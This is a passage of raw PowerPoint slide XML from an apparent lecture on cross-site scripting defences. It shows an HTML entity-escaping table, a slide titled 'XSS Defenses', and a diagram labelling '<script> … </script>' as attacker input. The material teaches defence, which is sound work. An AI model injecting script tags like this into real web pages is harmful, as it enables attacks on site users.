                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="30956"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7F0D8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="225"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>&amp;amp</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="30956"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7F0D8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="398304">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="225"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>“</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="30956"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AF7EC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="225"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>&amp;quot;</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="30956"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AF7EC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="398304">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="225"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>‘</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="30956"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7F0D8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="92075">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="225"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2000" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="40458C"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma"/>
                          <a:cs typeface="Tahoma"/>
                        </a:rPr>
                        <a:t>&amp;#39;</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" dirty="0">
                        <a:latin typeface="Tahoma"/>
                        <a:cs typeface="Tahoma"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="30956"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7F0D8"/>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64960357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2304D1-A4FF-CD4C-B5AA-38B94770BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>XSS Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96554CCF-0944-B640-8DC1-E4CCEDCF5D8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254752" y="5227222"/>
            <a:ext cx="2067560" cy="5715"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2067559" h="5714">
                <a:moveTo>
                  <a:pt x="0" y="5288"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2067305" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E0F28FA-0968-6D45-8C13-449FBC545D44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7322018" y="5211490"/>
            <a:ext cx="43815" cy="31750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="43815" h="31750">
                <a:moveTo>
                  <a:pt x="80" y="31465"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43265" y="15621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="31465"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C3DA380-C480-CB4E-830A-220244D6C6D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7322018" y="5211490"/>
            <a:ext cx="43815" cy="31750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="43815" h="31750">
                <a:moveTo>
                  <a:pt x="80" y="31465"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="43265" y="15621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="31465"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{630EC5CF-E041-1E47-B141-470FDB310CD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254752" y="2401162"/>
            <a:ext cx="1951989" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1951990">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1951481" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{048F415B-6217-D246-B65A-586FF6408EC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7206233" y="2385430"/>
            <a:ext cx="43815" cy="31750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="43815" h="31750">
                <a:moveTo>
                  <a:pt x="0" y="31465"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43224" y="15732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31465"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C25892A6-DBE2-834F-89DB-00D0B39D0552}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7206233" y="2385430"/>
            <a:ext cx="43815" cy="31750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="43815" h="31750">
                <a:moveTo>
                  <a:pt x="0" y="31465"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="43224" y="15732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31465"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75E55299-32A1-E14F-BB4C-4D51EC6BB586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3174" y="2886947"/>
            <a:ext cx="1482725" cy="1329055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="113664" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="894"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>input:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="88900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="795"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="88900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="88900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A79B65D3-56F5-5E4B-A992-D5975A9AA146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2244744"/>
            <a:ext cx="1631314" cy="1260475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1631314" h="1260475">
                <a:moveTo>
                  <a:pt x="0" y="1260455"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1631178" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBC7D7AC-CC3E-5448-B6C0-EC521FC83626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2916958" y="2218314"/>
            <a:ext cx="44450" cy="39370"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="44450" h="39369">
                <a:moveTo>
                  <a:pt x="19239" y="38879"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="13980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43823" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19239" y="38879"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37AADD2A-6C6A-4A44-BD0B-9899B54B7165}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2916958" y="2218314"/>
            <a:ext cx="44450" cy="39370"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="44450" h="39369">
                <a:moveTo>
                  <a:pt x="19239" y="38879"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="43823" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="13980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19239" y="38879"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113BFF3C-AC57-ED4B-A07D-2D60002D35DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="3657600"/>
            <a:ext cx="1710055" cy="1486535"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1710055" h="1486535">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1709474" y="1486499"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D71AC553-0C21-E14A-83C1-D029ED7D19C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2918350" y="5132227"/>
            <a:ext cx="43180" cy="40640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="43180" h="40639">
                <a:moveTo>
                  <a:pt x="42941" y="40235"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="23743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20647" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42941" y="40235"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="40458C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD6E2EC4-C5C3-9D47-861A-AC04125CCBED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2918350" y="5132227"/>
            <a:ext cx="43180" cy="40640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="43180" h="40639">
                <a:moveTo>
                  <a:pt x="0" y="23743"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="42941" y="40235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20647" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23743"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{568B9BA5-8788-5546-88C9-5AA3E8379730}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1627505" y="2344959"/>
            <a:ext cx="646430" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>direct</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
